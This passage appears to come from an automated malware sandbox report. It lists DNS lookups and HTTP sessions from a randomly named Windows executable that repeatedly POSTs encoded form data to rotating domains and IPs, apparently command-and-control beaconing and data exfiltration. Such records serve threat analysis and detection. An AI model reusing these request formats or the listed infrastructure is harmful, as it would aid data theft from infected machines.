                                                                                          Nov 24, 2024 08:22:17.315737963 CET5000980192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:18.334383965 CET5001080192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:18.453883886 CET8050010147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:18.454417944 CET5001080192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:18.470232010 CET5001080192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:18.589802980 CET8050010147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:19.677481890 CET8050010147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:19.677512884 CET8050010147.255.21.187192.168.2.5
                                                                                          Nov 24, 2024 08:22:19.677567959 CET5001080192.168.2.5147.255.21.187
                                                                                          Nov 24, 2024 08:22:19.971975088 CET5001080192.168.2.5147.255.21.187
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 08:19:56.311724901 CET | 192.168.2.5 | 1.1.1.1 | 0x672c | Standard query (0) | www.grandesofertas.fun | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:13.026331902 CET | 192.168.2.5 | 1.1.1.1 | 0x10a4 | Standard query (0) | www.jijievo.site | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:28.445776939 CET | 192.168.2.5 | 1.1.1.1 | 0xc146 | Standard query (0) | www.ytsd88.top | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:44.117522001 CET | 192.168.2.5 | 1.1.1.1 | 0xeca2 | Standard query (0) | www.bpgroup.site | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:59.321350098 CET | 192.168.2.5 | 1.1.1.1 | 0xe7e9 | Standard query (0) | www.fortevision.xyz | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:13.944644928 CET | 192.168.2.5 | 1.1.1.1 | 0x980b | Standard query (0) | www.rtpterbaruwaktu3.xyz | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:29.663794994 CET | 192.168.2.5 | 1.1.1.1 | 0x380c | Standard query (0) | www.prhmcjdz.tokyo | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:30.659902096 CET | 192.168.2.5 | 1.1.1.1 | 0x380c | Standard query (0) | www.prhmcjdz.tokyo | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:46.038666010 CET | 192.168.2.5 | 1.1.1.1 | 0xc359 | Standard query (0) | www.connecty.live | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:00.694613934 CET | 192.168.2.5 | 1.1.1.1 | 0xe3f4 | Standard query (0) | www.tals.xyz | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:15.278225899 CET | 192.168.2.5 | 1.1.1.1 | 0x3c41 | Standard query (0) | www.50food.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:30.070107937 CET | 192.168.2.5 | 1.1.1.1 | 0x97e3 | Standard query (0) | www.zriaraem-skiry.sbs | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:44.768188000 CET | 192.168.2.5 | 1.1.1.1 | 0xd79 | Standard query (0) | www.nmgzjwh.net | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:23:00.017064095 CET | 192.168.2.5 | 1.1.1.1 | 0x4fe0 | Standard query (0) | www.sklad-iq.online | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:23:14.805200100 CET | 192.168.2.5 | 1.1.1.1 | 0xf914 | Standard query (0) | www.supernutra01.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 08:19:56.608311892 CET | 1.1.1.1 | 192.168.2.5 | 0x672c | No error (0) | www.grandesofertas.fun | entri-domains.clickmax.io | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:19:56.608311892 CET | 1.1.1.1 | 192.168.2.5 | 0x672c | No error (0) | entri-domains.clickmax.io | ssl.goentri.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:19:56.608311892 CET | 1.1.1.1 | 192.168.2.5 | 0x672c | No error (0) | ssl.goentri.com | | 13.248.221.243 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:19:56.608311892 CET | 1.1.1.1 | 192.168.2.5 | 0x672c | No error (0) | ssl.goentri.com | | 76.223.74.74 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:13.515646935 CET | 1.1.1.1 | 192.168.2.5 | 0x10a4 | No error (0) | www.jijievo.site | all.wjscdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:20:13.515646935 CET | 1.1.1.1 | 192.168.2.5 | 0x10a4 | No error (0) | all.wjscdn.com | | 38.54.112.227 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:13.515646935 CET | 1.1.1.1 | 192.168.2.5 | 0x10a4 | No error (0) | all.wjscdn.com | | 154.90.35.240 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:13.515646935 CET | 1.1.1.1 | 192.168.2.5 | 0x10a4 | No error (0) | all.wjscdn.com | | 154.90.58.209 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:13.515646935 CET | 1.1.1.1 | 192.168.2.5 | 0x10a4 | No error (0) | all.wjscdn.com | | 154.205.143.51 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:13.515646935 CET | 1.1.1.1 | 192.168.2.5 | 0x10a4 | No error (0) | all.wjscdn.com | | 154.205.156.26 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:13.515646935 CET | 1.1.1.1 | 192.168.2.5 | 0x10a4 | No error (0) | all.wjscdn.com | | 154.205.159.116 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:29.381656885 CET | 1.1.1.1 | 192.168.2.5 | 0xc146 | No error (0) | www.ytsd88.top | | 47.76.213.197 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:44.918813944 CET | 1.1.1.1 | 192.168.2.5 | 0xeca2 | No error (0) | www.bpgroup.site | bpgroup.site | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:20:44.918813944 CET | 1.1.1.1 | 192.168.2.5 | 0xeca2 | No error (0) | bpgroup.site | | 74.48.143.82 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:59.551650047 CET | 1.1.1.1 | 192.168.2.5 | 0xe7e9 | No error (0) | www.fortevision.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:20:59.551650047 CET | 1.1.1.1 | 192.168.2.5 | 0xe7e9 | No error (0) | www.fortevision.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:14.917897940 CET | 1.1.1.1 | 192.168.2.5 | 0x980b | No error (0) | www.rtpterbaruwaktu3.xyz | rtpterbaruwaktu3.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:21:14.917897940 CET | 1.1.1.1 | 192.168.2.5 | 0x980b | No error (0) | rtpterbaruwaktu3.xyz | | 103.21.221.87 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:31.263331890 CET | 1.1.1.1 | 192.168.2.5 | 0x380c | No error (0) | www.prhmcjdz.tokyo | ymx01.cn | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:21:31.263331890 CET | 1.1.1.1 | 192.168.2.5 | 0x380c | No error (0) | ymx01.cn | | 8.210.46.21 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:31.263364077 CET | 1.1.1.1 | 192.168.2.5 | 0x380c | No error (0) | www.prhmcjdz.tokyo | ymx01.cn | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 08:21:31.263364077 CET | 1.1.1.1 | 192.168.2.5 | 0x380c | No error (0) | ymx01.cn | | 8.210.46.21 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:21:46.257069111 CET | 1.1.1.1 | 192.168.2.5 | 0xc359 | No error (0) | www.connecty.live | | 203.161.43.228 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:00.914685011 CET | 1.1.1.1 | 192.168.2.5 | 0xe3f4 | No error (0) | www.tals.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:00.914685011 CET | 1.1.1.1 | 192.168.2.5 | 0xe3f4 | No error (0) | www.tals.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:15.661079884 CET | 1.1.1.1 | 192.168.2.5 | 0x3c41 | No error (0) | www.50food.com | | 147.255.21.187 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:30.218441963 CET | 1.1.1.1 | 192.168.2.5 | 0x97e3 | No error (0) | www.zriaraem-skiry.sbs | | 172.67.159.61 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:30.218441963 CET | 1.1.1.1 | 192.168.2.5 | 0x97e3 | No error (0) | www.zriaraem-skiry.sbs | | 104.21.42.77 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:45.172195911 CET | 1.1.1.1 | 192.168.2.5 | 0xd79 | No error (0) | www.nmgzjwh.net | | 172.67.168.228 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:22:45.172195911 CET | 1.1.1.1 | 192.168.2.5 | 0xd79 | No error (0) | www.nmgzjwh.net | | 172.64.171.187 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:23:00.278650045 CET | 1.1.1.1 | 192.168.2.5 | 0x4fe0 | No error (0) | www.sklad-iq.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:23:14.951472044 CET | 1.1.1.1 | 192.168.2.5 | 0xf914 | No error (0) | www.supernutra01.online | | 172.67.220.36 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 08:23:14.951472044 CET | 1.1.1.1 | 192.168.2.5 | 0xf914 | No error (0) | www.supernutra01.online | | 104.21.24.198 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49775 | 13.248.221.243 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:19:56.752130985 CET | 478 | OUT | GET /wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.grandesofertas.fun
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:19:57.933898926 CET | 612 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:19:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILE
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49813 | 38.54.112.227 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:13.684988976 CET | 720 | OUT | POST /z9pi/ HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.jijievo.site
                                                                                          Referer: http://www.jijievo.site/z9pi/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=vc1efZByy0/GrhkBgaG4VigFTGb4MDfblLQ1XLbA1Bd0ugtrI7E4SxkiDPysll/LCuTrsmCQfRxj5OTtF+f0iAUko/HzcRJj3IObMSzYlE4FW+gHgw3chPCmHRSm2wh4KH0rdnIivl+4U+3p1sqmf5wmNcvW6NdadX4x5erHVFXoyfvALovc367jIsmGt95B7TMOB4c=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49819 | 38.54.112.227 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:16.410785913 CET | 740 | OUT | POST /z9pi/ HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.jijievo.site
                                                                                          Referer: http://www.jijievo.site/z9pi/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=vc1efZByy0/GqBUB75u4ZSgCPWb4eDezlLc1XKfQ1y50uFJrJ/w4TxkiX/zo41/MCueesnuQfSNj5MLtFJr3jQUmkfH9ChJj3IObMSn+lEwFWN4HgSfTiPClOxSmngh8KH0FdmUcvmG4U+Hp29qnEpwgC8uA2OlUE0p+7tqwG1iT3peqRKn0kaXbY/ux8NYohwc+fvIV1/DwhkGbfbH2EMnzZ/N3
Nov 24, 2024 08:20:18.042802095 CET | 241 | IN | HTTP/1.1 200 OK
                                                                                          Content-Encoding: gzip
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Date: Sun, 24 Nov 2024 07:20:17 GMT
                                                                                          Server: nginx
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Length: 44
                                                                                          Connection: close
                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                                          Data Ascii: KLIU(WHO-QHKM.g


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49828 | 38.54.112.227 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:19.121660948 CET | 1757 | OUT | POST /z9pi/ HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.jijievo.site
                                                                                          Referer: http://www.jijievo.site/z9pi/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49836 | 38.54.112.227 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:21.777203083 CET | 472 | OUT | GET /z9pi/?8z=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglcbqILcb35Ov8GaOwyCm29DGf4fuXu0q+2HMSGnvScCRQ==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:20:23.425554991 CET | 197 | IN | HTTP/1.1 200 OK
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Date: Sun, 24 Nov 2024 07:20:23 GMT
                                                                                          Server: nginx
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Length: 24
                                                                                          Connection: close
                                                                                          Data Ascii: Unable to get connection


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49852 | 47.76.213.197 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:29.528562069 CET | 714 | OUT | POST /8qt7/ HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.ytsd88.top
                                                                                          Referer: http://www.ytsd88.top/8qt7/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffNmsEniZLbjC5eLhBxHwSolXpgZx6a/ZdIrYXBI=
Nov 24, 2024 08:20:31.112967014 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:30 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49858 | 47.76.213.197 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:32.187596083 CET | 734 | OUT | POST /8qt7/ HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.ytsd88.top
                                                                                          Referer: http://www.ytsd88.top/8qt7/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIJv5zRGrqewHr7oJWd/E77Mqz1hNNVk/6Q2xPuG
Nov 24, 2024 08:20:33.758474112 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:33 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49868 | 47.76.213.197 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:34.846443892 CET | 1751 | OUT | POST /8qt7/ HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.ytsd88.top
                                                                                          Referer: http://www.ytsd88.top/8qt7/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Data Ascii: 8z= [TRUNCATED]
Nov 24, 2024 08:20:36.391530037 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49875 | 47.76.213.197 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:37.511085033 CET | 470 | OUT | GET /8qt7/?8z=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspdKSzY9KcXwRza5ymlGbypi62mmKXsyADr8TyMiRK3aVg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:20:39.097476959 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:38 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49891 | 74.48.143.82 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:45.056838036 CET | 720 | OUT | POST /mlxg/ HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.bpgroup.site
                                                                                          Referer: http://www.bpgroup.site/mlxg/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXojcfSBDcF65oi/hRhEEbsNvJ+xRaV2SVxsC4uMQ=
Nov 24, 2024 08:20:46.351105928 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Connection: close
                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                          pragma: no-cache
                                                                                          content-type: text/html
                                                                                          content-length: 1251
                                                                                          date: Sun, 24 Nov 2024 07:20:46 GMT
                                                                                          server: LiteSpeed
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 24, 2024 08:20:46.351172924 CET | 253 | IN |
                                                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49897 | 74.48.143.82 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:20:47.719041109 CET | 740 | OUT | POST /mlxg/ HTTP/1.1
                                                                                          Host: www.bpgroup.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.bpgroup.site
                                                                                          Referer: http://www.bpgroup.site/mlxg/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
